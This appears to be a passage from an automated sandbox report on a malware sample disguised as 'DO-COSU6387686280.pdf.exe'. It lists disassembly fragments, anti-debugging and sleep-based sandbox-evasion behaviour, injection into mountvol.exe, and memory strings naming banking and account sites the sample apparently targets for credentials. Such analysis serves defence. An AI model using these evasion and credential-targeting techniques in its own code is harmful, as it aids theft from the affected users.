                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_030B1366 push eax; iretd 6_2_030B1369
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A32587 push eax; iretd 6_2_02A32588
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A3C5DA push 0000003Fh; ret 6_2_02A3C5E2
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A3769D push ds; ret 6_2_02A3773F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A376EA push ds; ret 6_2_02A3773F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A37647 push ds; ret 6_2_02A3773F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A378E3 push esi; iretd 6_2_02A378E4
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034C0144 pushfd ; iretd 6_2_034C0146
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BC12E push 00000034h; iretd 6_2_034BC134
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034C0130 pushad ; retf 6_2_034C013B
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034BF067 pushad ; retf 6_2_034BF069
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034B50AF push esp; iretd 6_2_034B50B0
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034B85BE push esi; iretd 6_2_034B85C4
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034C0485 push ebx; ret 6_2_034C04B7
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_034B1A6E push 681173EFh; ret 6_2_034B1A73
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: section name: .text entropy: 7.988083531410528

                    Hooking and other Techniques for Hiding and Protection

                    Source: Possible double extension: pdf.exeStatic PE information: DO-COSU6387686280.pdf.exe
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: DO-COSU6387686280.pdf.exe PID: 352, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 2BA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 8E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: 9E00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: A000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeMemory allocated: B000000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D096E rdtsc 3_2_017D096E
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeWindow / User API: threadDelayed 2429Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeWindow / User API: threadDelayed 7544Jump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeAPI coverage: 0.6 %
                    Source: C:\Windows\SysWOW64\mountvol.exeAPI coverage: 2.6 %
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe TID: 1296Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exe TID: 6108Thread sleep count: 2429 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exe TID: 6108Thread sleep time: -4858000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exe TID: 6108Thread sleep count: 7544 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exe TID: 6108Thread sleep time: -15088000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep time: -65000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep count: 36 > 30Jump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep time: -54000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe TID: 7092Thread sleep time: -36000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A3C870 FindFirstFileW,FindNextFileW,FindClose,6_2_02A3C870
                    Source: p1h163LmP.6.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: discord.comVMware20,11696494690f
                    Source: p1h163LmP.6.drBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: p1h163LmP.6.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: p1h163LmP.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: mountvol.exe, 00000006.00000002.3902989488.0000000002B8E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                    Source: p1h163LmP.6.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: p1h163LmP.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: p1h163LmP.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: p1h163LmP.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: p1h163LmP.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: firefox.exe, 0000000B.00000002.2067305611.0000019ADBF4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: p1h163LmP.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: p1h163LmP.6.drBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: p1h163LmP.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: p1h163LmP.6.drBinary or memory string: global block list test formVMware20,11696494690
                    Source: EnLuReulIds.exe, 00000007.00000002.3910775657.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                    Source: p1h163LmP.6.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: p1h163LmP.6.drBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: p1h163LmP.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: p1h163LmP.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: p1h163LmP.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: p1h163LmP.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: p1h163LmP.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\mountvol.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D2B60 NtClose,LdrInitializeThunk,3_2_017D2B60
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01834180 mov eax, dword ptr fs:[00000030h]3_2_01834180
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE016 mov eax, dword ptr fs:[00000030h]3_2_017AE016
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE016 mov eax, dword ptr fs:[00000030h]3_2_017AE016
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE016 mov eax, dword ptr fs:[00000030h]3_2_017AE016
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01814000 mov ecx, dword ptr fs:[00000030h]3_2_01814000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01832000 mov eax, dword ptr fs:[00000030h]3_2_01832000
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178C0F0 mov eax, dword ptr fs:[00000030h]3_2_0178C0F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017D20F0 mov ecx, dword ptr fs:[00000030h]3_2_017D20F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017980E9 mov eax, dword ptr fs:[00000030h]3_2_017980E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0178A0E3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01826030 mov eax, dword ptr fs:[00000030h]3_2_01826030
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01816050 mov eax, dword ptr fs:[00000030h]3_2_01816050
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017880A0 mov eax, dword ptr fs:[00000030h]3_2_017880A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179208A mov eax, dword ptr fs:[00000030h]3_2_0179208A
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018163C0 mov eax, dword ptr fs:[00000030h]3_2_018163C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184C3CD mov eax, dword ptr fs:[00000030h]3_2_0184C3CD
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018343D4 mov eax, dword ptr fs:[00000030h]3_2_018343D4
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018343D4 mov eax, dword ptr fs:[00000030h]3_2_018343D4
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E3DB mov eax, dword ptr fs:[00000030h]3_2_0183E3DB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E3DB mov eax, dword ptr fs:[00000030h]3_2_0183E3DB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E3DB mov ecx, dword ptr fs:[00000030h]3_2_0183E3DB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183E3DB mov eax, dword ptr fs:[00000030h]3_2_0183E3DB
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178C310 mov ecx, dword ptr fs:[00000030h]3_2_0178C310
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B0310 mov ecx, dword ptr fs:[00000030h]3_2_017B0310
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA30B mov eax, dword ptr fs:[00000030h]3_2_017CA30B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA30B mov eax, dword ptr fs:[00000030h]3_2_017CA30B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017CA30B mov eax, dword ptr fs:[00000030h]3_2_017CA30B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017C63FF mov eax, dword ptr fs:[00000030h]3_2_017C63FF
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE3F0 mov eax, dword ptr fs:[00000030h]3_2_017AE3F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE3F0 mov eax, dword ptr fs:[00000030h]3_2_017AE3F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017AE3F0 mov eax, dword ptr fs:[00000030h]3_2_017AE3F0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A03E9 mov eax, dword ptr fs:[00000030h]3_2_017A03E9
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01868324 mov eax, dword ptr fs:[00000030h]3_2_01868324
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01868324 mov ecx, dword ptr fs:[00000030h]3_2_01868324
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01868324 mov eax, dword ptr fs:[00000030h]3_2_01868324
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01868324 mov eax, dword ptr fs:[00000030h]3_2_01868324
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A3C0 mov eax, dword ptr fs:[00000030h]3_2_0179A3C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017983C0 mov eax, dword ptr fs:[00000030h]3_2_017983C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017983C0 mov eax, dword ptr fs:[00000030h]3_2_017983C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017983C0 mov eax, dword ptr fs:[00000030h]3_2_017983C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017983C0 mov eax, dword ptr fs:[00000030h]3_2_017983C0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01812349 mov eax, dword ptr fs:[00000030h]3_2_01812349
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0186634F mov eax, dword ptr fs:[00000030h]3_2_0186634F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01838350 mov ecx, dword ptr fs:[00000030h]3_2_01838350
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0185A352 mov eax, dword ptr fs:[00000030h]3_2_0185A352
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov ecx, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0181035C mov eax, dword ptr fs:[00000030h]3_2_0181035C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788397 mov eax, dword ptr fs:[00000030h]3_2_01788397
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788397 mov eax, dword ptr fs:[00000030h]3_2_01788397
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01788397 mov eax, dword ptr fs:[00000030h]3_2_01788397
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E388 mov eax, dword ptr fs:[00000030h]3_2_0178E388
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E388 mov eax, dword ptr fs:[00000030h]3_2_0178E388
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178E388 mov eax, dword ptr fs:[00000030h]3_2_0178E388
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B438F mov eax, dword ptr fs:[00000030h]3_2_017B438F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017B438F mov eax, dword ptr fs:[00000030h]3_2_017B438F
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0183437C mov eax, dword ptr fs:[00000030h]3_2_0183437C
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01810283 mov eax, dword ptr fs:[00000030h]3_2_01810283
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01810283 mov eax, dword ptr fs:[00000030h]3_2_01810283
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01810283 mov eax, dword ptr fs:[00000030h]3_2_01810283
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178826B mov eax, dword ptr fs:[00000030h]3_2_0178826B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794260 mov eax, dword ptr fs:[00000030h]3_2_01794260
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794260 mov eax, dword ptr fs:[00000030h]3_2_01794260
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01794260 mov eax, dword ptr fs:[00000030h]3_2_01794260
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01796259 mov eax, dword ptr fs:[00000030h]3_2_01796259
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov ecx, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018262A0 mov eax, dword ptr fs:[00000030h]3_2_018262A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178A250 mov eax, dword ptr fs:[00000030h]3_2_0178A250
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0178823B mov eax, dword ptr fs:[00000030h]3_2_0178823B
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_018662D6 mov eax, dword ptr fs:[00000030h]3_2_018662D6
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02E1 mov eax, dword ptr fs:[00000030h]3_2_017A02E1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02E1 mov eax, dword ptr fs:[00000030h]3_2_017A02E1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02E1 mov eax, dword ptr fs:[00000030h]3_2_017A02E1
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0179A2C3 mov eax, dword ptr fs:[00000030h]3_2_0179A2C3
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01818243 mov eax, dword ptr fs:[00000030h]3_2_01818243
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01818243 mov ecx, dword ptr fs:[00000030h]3_2_01818243
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184A250 mov eax, dword ptr fs:[00000030h]3_2_0184A250
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0184A250 mov eax, dword ptr fs:[00000030h]3_2_0184A250
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02A0 mov eax, dword ptr fs:[00000030h]3_2_017A02A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_017A02A0 mov eax, dword ptr fs:[00000030h]3_2_017A02A0
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_0186625D mov eax, dword ptr fs:[00000030h]3_2_0186625D
                    Source: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exeCode function: 3_2_01840274 mov eax, dword ptr fs:[00000030h]3_2_01840274
